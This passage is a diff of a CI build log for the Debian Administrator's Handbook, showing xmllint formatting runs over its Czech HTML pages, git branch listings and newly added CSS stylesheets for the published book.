++ xmllint --noout tmp/cs-CZ/html/sect.master-plan.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.master-plan.html tmp/cs-CZ/html/sect.master-plan.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.monitoring.html
++ xmllint --noout tmp/cs-CZ/html/sect.monitoring.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.monitoring.html tmp/cs-CZ/html/sect.monitoring.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.network-config.html
++ xmllint --noout tmp/cs-CZ/html/sect.network-config.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.network-config.html tmp/cs-CZ/html/sect.network-config.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.network-diagnosis-tools.html
++ xmllint --noout tmp/cs-CZ/html/sect.network-diagnosis-tools.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.network-diagnosis-tools.html tmp/cs-CZ/html/sect.network-diagnosis-tools.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.nfs-file-server.html
++ xmllint --noout tmp/cs-CZ/html/sect.nfs-file-server.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.nfs-file-server.html tmp/cs-CZ/html/sect.nfs-file-server.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.office-suites.html
++ xmllint --noout tmp/cs-CZ/html/sect.office-suites.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.office-suites.html tmp/cs-CZ/html/sect.office-suites.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.other-derivatives.html
++ xmllint --noout tmp/cs-CZ/html/sect.other-derivatives.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.other-derivatives.html tmp/cs-CZ/html/sect.other-derivatives.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.other-security-considerations.html
++ xmllint --noout tmp/cs-CZ/html/sect.other-security-considerations.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.other-security-considerations.html tmp/cs-CZ/html/sect.other-security-considerations.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.package-authentication.html
++ xmllint --noout tmp/cs-CZ/html/sect.package-authentication.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.package-authentication.html tmp/cs-CZ/html/sect.package-authentication.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.package-meta-information.html
++ xmllint --noout tmp/cs-CZ/html/sect.package-meta-information.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.package-meta-information.html tmp/cs-CZ/html/sect.package-meta-information.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.power-management.html
++ xmllint --noout tmp/cs-CZ/html/sect.power-management.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.power-management.html tmp/cs-CZ/html/sect.power-management.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.quality-of-service.html
++ xmllint --noout tmp/cs-CZ/html/sect.quality-of-service.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.quality-of-service.html tmp/cs-CZ/html/sect.quality-of-service.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.quotas.html
++ xmllint --noout tmp/cs-CZ/html/sect.quotas.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.quotas.html tmp/cs-CZ/html/sect.quotas.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.raspbian.html
++ xmllint --noout tmp/cs-CZ/html/sect.raspbian.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.raspbian.html tmp/cs-CZ/html/sect.raspbian.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.regular-upgrades.html
++ xmllint --noout tmp/cs-CZ/html/sect.regular-upgrades.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.regular-upgrades.html tmp/cs-CZ/html/sect.regular-upgrades.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.release-lifecycle.html
++ xmllint --noout tmp/cs-CZ/html/sect.release-lifecycle.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.release-lifecycle.html tmp/cs-CZ/html/sect.release-lifecycle.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.remote-login.html
++ xmllint --noout tmp/cs-CZ/html/sect.remote-login.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.remote-login.html tmp/cs-CZ/html/sect.remote-login.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.rights-management.html
++ xmllint --noout tmp/cs-CZ/html/sect.rights-management.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.rights-management.html tmp/cs-CZ/html/sect.rights-management.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.role-of-distributions.html
++ xmllint --noout tmp/cs-CZ/html/sect.role-of-distributions.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.role-of-distributions.html tmp/cs-CZ/html/sect.role-of-distributions.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.rtc-clients.html
++ xmllint --noout tmp/cs-CZ/html/sect.rtc-clients.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.rtc-clients.html tmp/cs-CZ/html/sect.rtc-clients.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.rtc-services.html
++ xmllint --noout tmp/cs-CZ/html/sect.rtc-services.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.rtc-services.html tmp/cs-CZ/html/sect.rtc-services.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.searching-packages.html
++ xmllint --noout tmp/cs-CZ/html/sect.searching-packages.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.searching-packages.html tmp/cs-CZ/html/sect.searching-packages.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.selected-approach.html
++ xmllint --noout tmp/cs-CZ/html/sect.selected-approach.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.selected-approach.html tmp/cs-CZ/html/sect.selected-approach.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.selinux.html
++ xmllint --noout tmp/cs-CZ/html/sect.selinux.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.selinux.html tmp/cs-CZ/html/sect.selinux.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.setup-apt-package-repository.html
++ xmllint --noout tmp/cs-CZ/html/sect.setup-apt-package-repository.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.setup-apt-package-repository.html tmp/cs-CZ/html/sect.setup-apt-package-repository.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.shell-environment.html
++ xmllint --noout tmp/cs-CZ/html/sect.shell-environment.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.shell-environment.html tmp/cs-CZ/html/sect.shell-environment.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.source-package-structure.html
++ xmllint --noout tmp/cs-CZ/html/sect.source-package-structure.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.source-package-structure.html tmp/cs-CZ/html/sect.source-package-structure.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.supervision.html
++ xmllint --noout tmp/cs-CZ/html/sect.supervision.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.supervision.html tmp/cs-CZ/html/sect.supervision.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.syslog.html
++ xmllint --noout tmp/cs-CZ/html/sect.syslog.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.syslog.html tmp/cs-CZ/html/sect.syslog.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.tails.html
++ xmllint --noout tmp/cs-CZ/html/sect.tails.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.tails.html tmp/cs-CZ/html/sect.tails.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.tanglu.html
++ xmllint --noout tmp/cs-CZ/html/sect.tanglu.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.tanglu.html tmp/cs-CZ/html/sect.tanglu.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.task-scheduling-cron-atd.html
++ xmllint --noout tmp/cs-CZ/html/sect.task-scheduling-cron-atd.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.task-scheduling-cron-atd.html tmp/cs-CZ/html/sect.task-scheduling-cron-atd.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.ubuntu.html
++ xmllint --noout tmp/cs-CZ/html/sect.ubuntu.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.ubuntu.html tmp/cs-CZ/html/sect.ubuntu.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.user-group-databases.html
++ xmllint --noout tmp/cs-CZ/html/sect.user-group-databases.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.user-group-databases.html tmp/cs-CZ/html/sect.user-group-databases.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.user-space.html
++ xmllint --noout tmp/cs-CZ/html/sect.user-space.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.user-space.html tmp/cs-CZ/html/sect.user-space.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.virtual-private-network.html
++ xmllint --noout tmp/cs-CZ/html/sect.virtual-private-network.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.virtual-private-network.html tmp/cs-CZ/html/sect.virtual-private-network.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.virtualization.html
++ xmllint --noout tmp/cs-CZ/html/sect.virtualization.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.virtualization.html tmp/cs-CZ/html/sect.virtualization.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.web-browsers.html
++ xmllint --noout tmp/cs-CZ/html/sect.web-browsers.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.web-browsers.html tmp/cs-CZ/html/sect.web-browsers.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.who-is-this-book-for.html
++ xmllint --noout tmp/cs-CZ/html/sect.who-is-this-book-for.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.who-is-this-book-for.html tmp/cs-CZ/html/sect.who-is-this-book-for.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.why-debian-stable.html
++ xmllint --noout tmp/cs-CZ/html/sect.why-debian-stable.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.why-debian-stable.html tmp/cs-CZ/html/sect.why-debian-stable.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.why-debian.html
++ xmllint --noout tmp/cs-CZ/html/sect.why-debian.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.why-debian.html tmp/cs-CZ/html/sect.why-debian.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.why-gnu-linux.html
++ xmllint --noout tmp/cs-CZ/html/sect.why-gnu-linux.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.why-gnu-linux.html tmp/cs-CZ/html/sect.why-gnu-linux.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.windows-emulation.html
++ xmllint --noout tmp/cs-CZ/html/sect.windows-emulation.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.windows-emulation.html tmp/cs-CZ/html/sect.windows-emulation.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.windows-file-server-with-samba.html
++ xmllint --noout tmp/cs-CZ/html/sect.windows-file-server-with-samba.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.windows-file-server-with-samba.html tmp/cs-CZ/html/sect.windows-file-server-with-samba.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/security.html
++ xmllint --noout tmp/cs-CZ/html/security.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/security.html tmp/cs-CZ/html/security.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/short-remedial-course.html
++ xmllint --noout tmp/cs-CZ/html/short-remedial-course.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/short-remedial-course.html tmp/cs-CZ/html/short-remedial-course.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/solving-problems.html
++ xmllint --noout tmp/cs-CZ/html/solving-problems.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/solving-problems.html tmp/cs-CZ/html/solving-problems.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/the-debian-project.html
++ xmllint --noout tmp/cs-CZ/html/the-debian-project.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/the-debian-project.html tmp/cs-CZ/html/the-debian-project.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/unix-services.html
++ xmllint --noout tmp/cs-CZ/html/unix-services.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/unix-services.html tmp/cs-CZ/html/unix-services.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/website.html
++ xmllint --noout tmp/cs-CZ/html/website.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/website.html tmp/cs-CZ/html/website.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/workstation.html
++ xmllint --noout tmp/cs-CZ/html/workstation.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/workstation.html tmp/cs-CZ/html/workstation.html
++ read _FILE_PATH
 + file --brief --mime-type tmp/da-DK/html/advanced-administration.html
 + xmllint --noout tmp/da-DK/html/advanced-administration.html
 + xmllint --pretty 2 --output tmp/da-DK/html/advanced-administration.html tmp/da-DK/html/advanced-administration.html
@@ -34329,8 +35369,8 @@ Would remove tmp/
 + xmllint --noout tmp/zh-TW/html/workstation.html
 + xmllint --pretty 2 --output tmp/zh-TW/html/workstation.html tmp/zh-TW/html/workstation.html
 + read _FILE_PATH
-+ rm /home/travis/tmp/base.mKmY0h/fifo/files.txt
-+ mv publish tmp log /home/travis/tmp/base.mKmY0h/divert
++ rm /home/travis/tmp/base.D31sXm/fifo/files.txt
++ mv publish tmp log /home/travis/tmp/base.D31sXm/divert
 + cd -
 /
 + return 0
@@ -34339,8 +35379,8 @@ Would remove tmp/
 + xmllint --noout tmp/zh-TW/html/workstation.html
 + xmllint --pretty 2 --output tmp/zh-TW/html/workstation.html tmp/zh-TW/html/workstation.html
 + read _FILE_PATH
-+ rm /home/travis/tmp/base.mKmY0h/fifo/files.txt
-+ mv publish tmp log /home/travis/tmp/base.mKmY0h/divert
++ rm /home/travis/tmp/base.D31sXm/fifo/files.txt
++ mv publish tmp log /home/travis/tmp/base.D31sXm/divert
 + cd -
 /
 + return 0
@@ -34356,13 +35396,13 @@ tweek	https://github.com/l/debian-handbook.git (push)
 weblate	git://git.weblate.org/debian-handbook.git (fetch)
 weblate	git://git.weblate.org/debian-handbook.git (push)
   jessie/master/proposal/put_backcover_and_website_as_appendix               3ab4d18f1 [tweek/jessie/master/proposal/put_backcover_and_website_as_appendix] Put backcover and website as appendix
-  jessie/master/translation/origin                                           675562fa0 [origin/jessie/master] radek 889
+  jessie/master/translation/origin                                           07024dad5 [origin/jessie/master] cs-CZ: fix syntax error
   jessie/master/translation/weblate                                          be47c15e5 [weblate/jessie/master: ahead 1] Sync PO files to Weblate
-  stretch/master/build                                                       3e01add8e [origin/stretch/master: ahead 42] Update PO files
-* stretch/master/gh-pages                                                    293d3e06a [github/gh-pages] Save buid result at 2019-02-16T22:33:44+00:00
+  stretch/master/build                                                       9e7002d43 [origin/stretch/master: ahead 43] Update PO files
+* stretch/master/gh-pages                                                    d4864c2f7 [github/gh-pages] Save buid result at 2019-02-17T05:07:05+00:00
   stretch/master/translation/origin                                          f04e65bc6 [origin/stretch/master] Merge branch 'jessie/master' into stretch/master
-  remotes/github/gh-pages                                                    293d3e06a Save buid result at 2019-02-16T22:33:44+00:00
-  remotes/origin/jessie/master                                               675562fa0 radek 889
+  remotes/github/gh-pages                                                    d4864c2f7 Save buid result at 2019-02-17T05:07:05+00:00
+  remotes/origin/jessie/master                                               07024dad5 cs-CZ: fix syntax error
   remotes/origin/stretch/master                                              f04e65bc6 Merge branch 'jessie/master' into stretch/master
   remotes/tweek/jessie/master/proposal/put_backcover_and_website_as_appendix 3ab4d18f1 Put backcover and website as appendix
   remotes/weblate/jessie/master                                              12741125e id-ID: Translated using Weblate.
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/css/brand.css b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/css/brand.css
new file mode 100644
index 000000000..d86cba937
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/css/brand.css
@@ -0,0 +1,14 @@
+/*headings*/
+h1, h2, h3, h4, h5, h6,
+div.producttitle,
+div.subtitle,
+div.author div.author,
+div.translator div.translator,
+div.othercredit div.othercredit,
+div.editor div.editor,
+div.contrib div.contrib,
+.title,
+.titlepage .edition,
+.titlepage .releaseinfo {
+	color: #336699;
+}
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/css/common.css b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/css/common.css
new file mode 100644
index 000000000..d87ec69f5
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/css/common.css
@@ -0,0 +1,1740 @@
+* {
+	widows: 4 !important;
+	orphans: 4 !important;
+}
+
+body, h1, h2, h3, h4, h5, h6, pre, li, div {
+	line-height: 1.29em;
+}
+
+body {
+	background-color: white;
+	margin:0 auto;
+	font-family: "liberation sans", "Myriad ", "Bitstream Vera Sans", "Lucida Grande", "Luxi Sans", "Trebuchet MS", helvetica, verdana, arial, sans-serif;
+	font-size: 14px;
+	max-width: 770px;
+	color: black;
+}
+
+body.toc_embeded {
+	/*for web hosting system only*/
+	margin-left: 300px;
+}
+
+object.toc, iframe.toc {
+	/*for web hosting system only*/
+	border-style: none;
+	position: fixed;
+	width: 290px;
+	height: 99.99%;
+	top: 0;
+	left: 0;
+	z-index: 100;
+	border-style: none;
+	border-right:1px solid #999;
+}
+
+/* Hide web menu */
+
+body.notoc {
+	margin-left: 3em;
+}
+
+iframe.notoc {
+	border-style:none;
+	border: none;
+	padding: 0px;
+	position:fixed;
+	width: 21px;
+	height: 29px;
+	top: 0px;
+	left:0;
+	overflow: hidden;
+	margin: 0px;
+	margin-left: -3px;
+}
+/* End hide web menu */
+
+/* desktop styles */
+body.desktop {
+	margin-left: 26em;
+}
+
+body.desktop .book > .toc {
+	display:block;
+	width:24em;
+	height:99.99%;
+	position:fixed;
+	overflow:auto;
+	top:0px;
+	left:0px;
+/*	padding-left:1em; */
+	background-color:#EEEEEE;
+	font-size: 12px;
+}
+
+body.pdf {
+	max-width: 100%;
+}
+
+.toc {
+	line-height:1.35em;
+}
+
+.toc .glossary,
+.toc .chapter, .toc .appendix {
+	margin-top:1em;
+}
+
+.toc .part {
+	margin-top:1em;
+	display:block;
+}
+
+span.glossary,
+span.appendix {
+	display:block;
+	margin-top:0.5em;
+}
+
+div {
+	padding-top:0px;
+}
+
+div.section {
+}
+
+p, div.para {
+	padding-top: 0px;
+	margin-top: 1em;
+	padding-bottom: 0px;
+	margin-bottom: 1em;
+}
+
+div.formalpara {
+	padding-top: 0px;
+	margin-top: 1em;
+	padding-bottom: 0px;
+	margin-bottom: 1em;
+}
+
+.varlistentry div.para {
+
+}
+
+/*Links*/
+a {
+	outline: none;
+}
+
+a:link {
+	text-decoration: none;
+	border-bottom: 1px dotted ;
+	color:#3366cc;
+}
+
+body.pdf a:link {
+	word-wrap: break-word;
+}
+
+a:visited {
+	text-decoration:none;
+	border-bottom: 1px dotted ;
+	color:#003366;
+}
+
+div.longdesc-link {
+	float:right;
+	color:#999;
+}
+
+.toc a, .qandaset a {
+	font-weight:normal;
+	border:none;
+}
+
+.toc a:hover, .qandaset a:hover
+{
+	border-bottom: 1px dotted;
+}
+
+/*headings*/
+h1, h2, h3, h4, h5, h6 {
+	color: #336699;
+	margin-top: 0px;
+	margin-bottom: 0px;
+	background-color: transparent;
+	margin-bottom: 0px;
+	margin-top: 20px;
+	word-wrap: break-word;
+}
+
+h1 {
+	font-size: 22px;
+}
+
+.titlepage h1.title {
+	text-align:left;
+}
+
+.book > .titlepage h1.title {
+	text-align: center;
+}
+
+.article > .titlepage h1.title,
+.article > .titlepage h2.title {
+	text-align: center;
+}
+
+.set .titlepage > div > div > h1.title {
+	text-align: center;
+}
+
+.part > .titlepage h1.title {
+	text-align: center;
+	font-size: 24px;
+}
+
+div.producttitle {
+	margin-top: 0px;
+	margin-bottom: 20px;
+	font-size: 48px;
+	font-weight: bold;
+/* 	background: #003d6e url(../images/h1-bg.png) top left repeat-x; */
+	color:  #336699;
+	text-align: center;
+	padding-top: 12px;
+}
+
+.titlepage .corpauthor {
+	margin-top: 1em;
+	text-align: center;
+}
+
+.section h1.title {
+	font-size: 18px;
+	padding: 0px;
+	color: #336699;
+	text-align: left;
+	background: white;
+}
+
+h2 {
+	font-size: 20px;
+	margin-top: 30px;
+}
+
+
+.book div.subtitle, .book h2.subtitle, .book h3.subtitle {
+	margin-top: 1em;
+	margin-bottom: 1em;
+	font-size: 18px;
+	text-align: center;
+}
+
+div.subtitle {
+	color:  #336699;
+	font-weight: bold;
+}
+
+h1.legalnotice {
+	font-size: 24px;
+}
+
+.preface > div > div > div > h2.title,
+.preface > div > div > div > h1.title {
+	margin-top: 1em;
+	font-size: 24px;
+}
+
+.appendix h2 {
+	font-size: 24px;
+}
+
+
+
+h3 {
+	font-size: 14px;
+	padding-top:0px;
+	padding-bottom: 0px;
+	margin-bottom: 0px;
+}
+h4 {
+	font-size: 14px;
+	padding-top:0px;
+	padding-bottom:0px;
+}
+
+h5 {
+	font-size: 14px;
+}
+
+h6 {
+	font-size: 14px;
+	margin-bottom: 0px;
+}
+
+.abstract h6 {
+	margin-top:1em;
+	margin-bottom:.5em;
+	font-size: 24px;
+}
+
+.index > div > div > div > h2.title {
+	font-size: 24px;
+}
+
+.chapter > div > div > div > h2.title {
+	font-size: 24px;
+}
+
+.section > div > div > div > h2.title {
+	font-size: 21px;
+}
+
+.section > div > div > div > h3.title {
+	font-size: 17px;
+}
+
+/*element rules*/
+hr {
+	border-collapse: collapse;
+	border-style:none;
+	border-top: 1px dotted #ccc;
+	width:100%;
+}
+
+/* web site rules */
+ul.languages, .languages li {
+	display:inline;
+	padding:0px;
+}
+
+.languages li a {
+	padding:0px .5em;
+	text-decoration: none;
+}
+
+.languages li p, .languages li div.para {
+	display:inline;
+}
+
+.languages li a:link, .languages li a:visited {
+	color:#444;
+}
+
+.languages li a:hover, .languages li a:focus, .languages li a:active {
+	color:black;
+}
+
+ul.languages {
+	display:block;
+	background-color:#eee;
+	padding:.5em;
+}
+
+/*supporting stylesheets*/
+
+/*unique to the webpage only*/
+.books {
+	position:relative;
+}
+
+.versions li {
+	width:100%;
+	clear:both;
+	display:block;
+}
+
+a.version {
+	font-size: 20px;
+	text-decoration:none;
+	width:100%;
+	display:block;
+	padding:1em 0px .2em 0px;
+	clear:both;
+}
+
+a.version:before {
+	content:"Version";
+	font-size: smaller;
+}
+
+a.version:visited, a.version:link {
+	color:#666;
+}
+
+a.version:focus, a.version:hover {
+	color:black;
+}
+
+.books {
+	display:block;
+	position:relative;
+	clear:both;
+	width:100%;
+}
+
+.books li {
+	display:block;
+	width:200px;
+	float:left;
+	position:relative;
+	clear: none ;
+}
+
+.books .html {
+	width:170px;
+	display:block;
+}
+
+.books .pdf {
+	position:absolute;
+	left:170px;
+	top:0px;
+	font-size: smaller;
+}
+
+.books .pdf:link, .books .pdf:visited {
+	color:#555;
+}
+
+.books .pdf:hover, .books .pdf:focus {
+	color:#000;
+}
+
+.books li a {
+	text-decoration:none;
+}
+
+.books li a:hover {
+	color:black;
+}
+
+/*products*/
+.products li {
+	display: block;
+	width:300px;
+	float:left;
+}
+
+.products li a {
+	width:300px;
+	padding:.5em 0px;
+}
+
+.products ul {
+	clear:both;
+}
+
+/*revision history*/
+.revhistory {
+	display:block;
+}
+
+.revhistory table {
+	background-color:transparent;
+	border-color:#fff;
+	padding:0px;
+	margin: 0;
+	border-collapse:collapse;
+	border-style:none;
+}
+
+.revhistory td {
+	text-align :left;
+	padding:0px;
+	border: none;
+	border-top: 1px solid #fff;
+	font-weight: bold;
+}
+
+.revhistory .simplelist td {
+	font-weight: normal;
+}
+
+.revhistory .simplelist {
+	margin-bottom: 1.5em;
+	margin-left: 1em;
+}
+
+.revhistory table th {
+	display: none;
+}
+
+
+/*credits*/
+.authorgroup div {
+	clear:both;
+	text-align: center;
+}
+
+div.author div.author,
+div.translator div.translator,
+div.othercredit div.othercredit,
+div.editor div.editor,
+div.contrib div.contrib {
+	margin: 0px;
+	padding: 0px;
+	margin-top: 12px;
+	font-size: 14px;
+	font-weight: bold;
+	color: #336699;
+}
+
+div.editedby {
+	margin-top: 15px;
+	margin-bottom: -0.8em;
+}
+
+div.authorgroup .author, 
+div.authorgroup.editor, 
+div.authorgroup.translator, 
+div.authorgroup.othercredit,
+div.authorgroup.contrib {
+	display: block;
+	font-size: 14px;
+}
+
+.revhistory .author {
+	display: inline;
+}
+
+.othercredit h3 {
+	padding-top: 1em;
+}
+
+
+.othercredit {
+	margin:0px;
+	padding:0px;
+}
+
+.releaseinfo {
+	clear: both;
+}
+
+.copyright {
+	margin-top: 1em;
+}
+
+/* qanda sets */
+.answer {
+	margin-bottom:1em;
+	border-bottom:1px dotted #ccc;
+}
+
+.qandaset .toc {
+	border-bottom:1px dotted #ccc;
+}
+
+.question {
+	font-weight:bold;
+}
+
+.answer .data, .question .data {
+	padding-left: 2.6em;
+}
+
+.answer .label, .question .label {
+	float:left;
+	font-weight:bold;
+}
+
+/* inline syntax highlighting */
+.perl_Alert {
+	color: #0000ff;
+}
+
+.perl_BaseN {
+	color: #007f00;
+}
+
+.perl_BString {
+	color: #5C3566;
+}
+
+.perl_Char {
+	color: #ff00ff;
+}
+
+.perl_Comment {
+	color: #888888;
+}
+
+
+.perl_DataType {
+	color: #0000ff;
+}
+
+
+.perl_DecVal {
+	color: #00007f;
+}
+
+
+.perl_Error {
+	color: #ff0000;
+}
+
+
+.perl_Float {
+	color: #00007f;
+}
+
+
+.perl_Function {
+	color: #007f00;
+}
+
+
+.perl_IString {
+	color: #5C3566;
+}
+
+
+.perl_Keyword {
+	color: #002F5D;
+}
+
+
+.perl_Operator {
+	color: #ffa500;
+}
+
+
+.perl_Others {
+	color: #b03060;
+}
+
+
+.perl_RegionMarker {
+	color: #96b9ff;
+}
+
+
+.perl_Reserved {
+	color: #9b30ff;
+}
+
+
+.perl_String {
+	color: #5C3566;
+}
+
+
+.perl_Variable {
+	color: #0000ff;
+}
+
+
+.perl_Warning {
+	color: #0000ff;
+}
+
+/*Lists*/
+ul {
+    list-style-image: url("../images/dot.png");
+    list-style-type: circle;
+    padding-left: 1.6em;
+}
+
+ul ul {
+    list-style-image: url("../images/dot2.png");
+    list-style-type: circle;
+}
+
+ol.1 {
+	list-style-type: decimal;
+}
+
+ol.a,
+ol ol {
+	list-style-type: lower-alpha;
+}
+
+ol.i {
+	list-style-type: lower-roman;
+}
+ol.A {
+	list-style-type: upper-alpha;
+}
+
+ol.I {
+	list-style-type: upper-roman;
+}
+
+dt {
+	font-weight:bold;
+	margin-bottom:0px;
+	padding-bottom:0px;
+}
+
+dd {
+	margin:0px;
+	margin-left:2em;
+	padding-top:0px;
+}
+
+li {
+	padding-top: 0px;
+	margin-top: 0px;
+	padding-bottom: 0px;
+/*	margin-bottom: 16px; */
+}
+
+/*images*/
+img {
+	display:block;
+	margin: 2em 0;
+	max-width: 100%;
+}
+
+.inlinemediaobject,
+.inlinemediaobject img,
+.inlinemediaobject object {
+	display:inline;
+	margin:0px;
+	overflow: hidden;
+}
+
+.figure {
+    margin-top: 1em;
+    width: 100%;
+}
+
+.figure img,
+.mediaobject img {
+	display:block;
+	margin: 0em;
+}
+
+.figure .title {
+	margin-bottom:2em;
+	padding:0px;
+}
+
+/*document modes*/
+.confidential {
+	background-color:#900;
+	color:White;
+	padding:.5em .5em;
+	text-transform:uppercase;
+	text-align:center;
+}
+
+.longdesc-link {
+	display:none;
+}
+
+.longdesc {
+	display:none;
+}
+
+.prompt {
+	padding:0px .3em;
+}
+
+/*user interface styles*/
+.screen .replaceable {
+}
+
+.guibutton, .guilabel {
+	font-family: "dejavu sans mono","liberation mono", "bitstream vera mono", "dejavu mono", monospace;
+	font-weight: bold;
+}
+
+.example {
+	background-color: #ffffff;
+	border-left: 3px solid #aaaaaa;
+	padding-top: 1px;
+	padding-bottom: 0.1em;
+	padding-left: 1em;
+}
+
+.equation {
+	border-left: 3px solid #aaaaaa;
+	background-color: #ffffff;
+	padding-top: 1px;
+	padding-bottom: 0.1em;
+	padding-left: 1em;
+}
+
+.equation-contents {
